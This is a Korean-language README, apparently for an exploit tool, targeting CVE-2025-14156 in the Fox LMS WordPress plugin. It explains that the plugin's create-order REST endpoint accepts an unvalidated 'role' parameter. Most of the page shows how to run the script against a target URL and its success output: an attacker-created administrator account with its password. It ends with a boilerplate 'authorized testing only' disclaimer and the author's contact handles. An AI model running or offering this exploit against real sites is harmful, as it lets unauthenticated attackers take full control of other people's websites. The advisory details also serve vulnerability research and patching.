
Fox LMS – WordPress LMS Plugin 1.0.4.7 - 1.0.5.1 - 'createOrder'를 통한 인증되지 않은 권한 상승
Fox LMS – WordPress LMS 플러그인 1.0.4.7 - 1.0.5.1 - 'createOrder'를 통한 인증되지 않은 권한 상승
Fox LMS – WordPress LMS 플러그인 (v1.0.4.7 ~ v1.0.5.1) – createOrder를 통한 인증되지 않은 권한 상승
Fox LMS for WordPress의 1.0.5.1을 포함한 모든 버전에서 권한 상승 취약점이 존재합니다. /fox-lms/v1/payments/create-order REST API 엔드포인트는 새 사용자를 생성할 때 'role' 매개변수를 적절히 검증하지 않아, 인증되지 않은 공격자가 관리자를 포함한 임의의 역할을 가진 계정을 생성할 수 있습니다.
CVE: CVE-2025-14156
CVSS Score: 9.8 (Critical)
위험: 전체 사이트 손상
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
성공적인 익스플로잇 시 스크립트는 다음만 출력합니다:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
익스플로잇이 실패하면 간결한 오류 메시지만 표시됩니다.
'administrator' 역할을 주입합니다.이 도구는 교육 및 승인된 테스트 목적으로만 사용됩니다. 명시적 허가 없이 시스템에 무단 사용하는 것은 불법입니다. 작성자는 이 스크립트의 사용으로 인한 오용, 손해 또는 법적 결과에 대해 책임을 지지 않습니다. 항상 책임감 있는 공개 절차를 따르고 대상 테스트 전에 서면 승인을 받으십시오.
Telegram: @Nxploited
Github: Nxploited